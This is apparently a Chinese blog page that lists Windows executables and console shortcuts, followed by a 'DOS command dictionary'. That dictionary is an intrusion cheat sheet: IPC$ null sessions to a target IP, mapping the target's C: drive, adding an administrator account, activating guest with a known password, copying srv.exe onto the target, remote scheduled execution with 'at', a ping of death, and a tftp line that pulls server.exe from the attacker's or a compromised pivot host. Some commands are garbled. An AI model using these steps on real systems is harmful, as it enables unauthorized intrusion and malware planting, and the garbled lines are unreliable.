regedt32.exe 32位注册服务 
regini.exe 用脚本修改注册许可 
regwiz.exe 注册向导 
replace.exe 用源目录中的同名文件替换目标目录中的文件。 
rexec.exe rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。 
risetup.exe 运行远程安装向导服务 (XP不可用) 
route.exe 控制网络路由表 
rsh.exe 在运行 RSH 服务的远程计算机上运行命令 
rsnotify.exe 远程存储通知回显 
runas.exe 允许用户用其他权限运行指定的工具和程序 
rundll32.exe 启动32位DLL程序 
rwinsta.exe 重置会话子系统硬件和软件到最初的值 
Sndvol32 音量控制程序 
sfc.exe 或CMD\ sfc.exe 回车 系统文件检查器 
services.msc 网络连接服务 
syskey 系统加密,(一旦加密就不能解开,保护windows xp系统的双重密码wupdmgr WIDNOWS Update) 
SCANREG/RESTORE 命令恢复最近的注册表 
secedit.exe 自动化安全性配置管理 
services.exe 控制所有服务 
sethc.exe 设置高对比 
setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号 
sfc.exe 系统文件检查 
shadow.exe 监控另外一台中端服务器会话 
shrpubw.exe 建立和共享文件夹 
sigverif.exe 文件签名验证 
smlogsvc.exe 性能日志和警报 (XP不可用) 
sndrec32.exe 录音机 
sndvol32.exe 显示声音控制信息 
snmp.exe 简单网络管理协议 (XP不可用) 
snmptrap.exe SNMP工具 (XP不可用) 
srvmgr.exe 服务器管理器 (XP不可用) 
subst.exe 将路径与驱动器盘符关联 
sysedit.exe 系统配置编辑器 
syskey.exe NT账号数据库加密工具 
sysocmgr.exe > Windows 安装程序 
systray.exe 在低权限运行systray 
taskmgr 任务管理器 
tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用) 
tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务( 
taskman.exe 任务管理器 (XP不可用) 
taskmgr.exe 任务管理器 
tcmsetup.exe 电话服务客户安装 
tcpsvcs.exe TCP服务 
termsrv.exe 终端服务 
tftp.exe 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件 
themes.exe 桌面主题 (XP不可用) 
tlntadmn.exe Administrator Telnet服务管理 
tlntsess.exe 显示目前的Telnet会话 
tlntsvr.exe 开始Telnet服务 
tracert.exe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由 
tsadmin.exe Administrator 终端服务管理器 (XP不可用) 
tscon.exe 粘贴用户会话到终端对话 
tsdiscon.exe 断开终端服务的用户 
tskill.exe 杀掉终端服务 
tsprof.exe 用终端服务得出查询结果 
tsshutdn.exe 关闭系统 
unlodctr.exe 性能监视器的一部分 
upg351db.exe 升级Jet数据库 (XP不可用) 
ups.exe UPS service UPS服务 
user.exe Windows核心服务 
userinit.exe 打开我的文档 
usrmgr.exe 域用户管理器 
utilman.exe 指定2000启动时自动打开那台机器 
vwipxspx.exe 调用IPX/SPX VDM 
w32tm.exe 时间服务器 
wextract.exe 解压缩Windows文件 
winchat.exe 打开Windows聊天工具 
winhlp32.exe 运行帮助系统 
winmsd.exe 查看系统信息 
winver.exe 显示Windows版本 
wizmgr.exe Windows管理向导 (XP不可用) 
wjview.exe Java 命令行调用Java 
write.exe 打开写字板 
wscript.exe 脚本工具 
wupdmgr.exe Windows update 运行Windows update升级向导 
winver 检查Windows版本 
Win98系统工具 
开始,运行,输入Msconfig 系统配置实用工具配置启动选项,包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的启动项。并可设置是否故障启动。 
开始,运行,输入Regedit 注册表修改工具 注册表编辑器,如果没有把握不要随意修改注册表! 
开始,运行,输入Regsvr32 dll注册工具 当提示找不到dll文件时,可用此来注册该动态连接库。 
开始,运行,输入Regwiz 注册向导 用于注册。校验系统文件,并可恢复系统文件。 
如果启动时出现类似*.vxd文件错误,可用此恢复该vxd文件。 
开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误,可用来初步修复。 
开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。 
开始,运行,输入NETSCAPE 

ESC:清除当前命令行; 
F7:显示命令历史记录,以图形列表窗的形式给出所有曾经输入的命令,并可用上下箭头键选择再次执行该命令。 
F8:搜索命令的历史记录,循环显示所有曾经输入的命令,直到按下回车键为止; 
F9:按编号选择命令,以图形对话框方式要求您输入命令所对应的编号(从0开始),并将该命令显示在屏幕上; 
Ctrl+H:删除光标左边的一个字符; 
Ctrl+C Ctrl+Break,强行中止命令执行; 
Ctrl+M:表示回车确认键; 
Alt+F7:清除所有曾经输入的命令历史记录; 
Alt+PrintScreen:截取屏幕上当前命令窗里的内容。 
病毒破坏了系统文件,请使用杀毒软件查杀病毒,然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可 
DOS命令字典..收藏 

net use \ip\ipcnbsp;" " /user:" " 建立IPC空链接 

net use \ip\ipcnbsp;"密码" /user:"用户名" 建立IPC非空链接 

net use h: \ip\cnbsp;"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: 

net use h: \ip\cnbsp;登陆后映射对方C:到本地为H: 

net use \ip\ipcnbsp;/del 删除IPC链接 

net use h: /del 删除映射对方到本地的为H:的映射 

net user 用户名 密码 /add 建立用户 

net user guest /active:yes 激活guest用户 

net user 查看有哪些用户 

net user 帐户名 查看帐户的属性 

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数 

net start 查看开启了哪些服务 

net start 服务名 开启服务;(如:net start telnet, net start schedule) 

net stop 服务名 停止某服务 

net time \目标ip 查看对方时间 

net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 

net view 查看本地局域网内开启了哪些共享 

net view \ip 查看对方局域网内开启了哪些共享 

net config 显示系统网络设置 

net logoff 断开连接的共享 

net pause 服务名 暂停某服务 

net send ip "文本信息" 向对方发信息 

net ver 局域网内正在使用的网络连接类型和信息 

net share 查看本地开启的共享 

net share ipcnbsp;开启ipc 

net share ipcnbsp;/del 删除ipc 

net share cnbsp;/del 删除C:共享 

net user guest 12345 用guest用户登陆后用将密码改为12345 

net password 密码 更改系统登陆密码 

netstat -a 查看开启了哪些端口,常用netstat -an 

netstat -n 查看端口的网络连接情况,常用netstat -an 

netstat -v 查看正在进行的工作 

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) 

netstat -s 查看正在使用的所有协议使用情况 

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 

fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 

at id号 开启已注册的某个计划任务 

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 

at id号 /delete 停止某个已注册的计划任务 

at 查看所有的计划任务 

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 

finger username @host 查看最近有哪些用户登陆 

telnet ip 端口 远和登陆服务器,默认端口为23 

open ip 连接到IP(属telnet登陆后的命令) 

telnet 在本机上直接键入telnet 将进入本机的telnet 

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 

copy c:\srv.exe \ip\***nbsp;复制本地c:\srv.exe到对方的***下 

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 

copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件(所有文件)至本地C: 

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值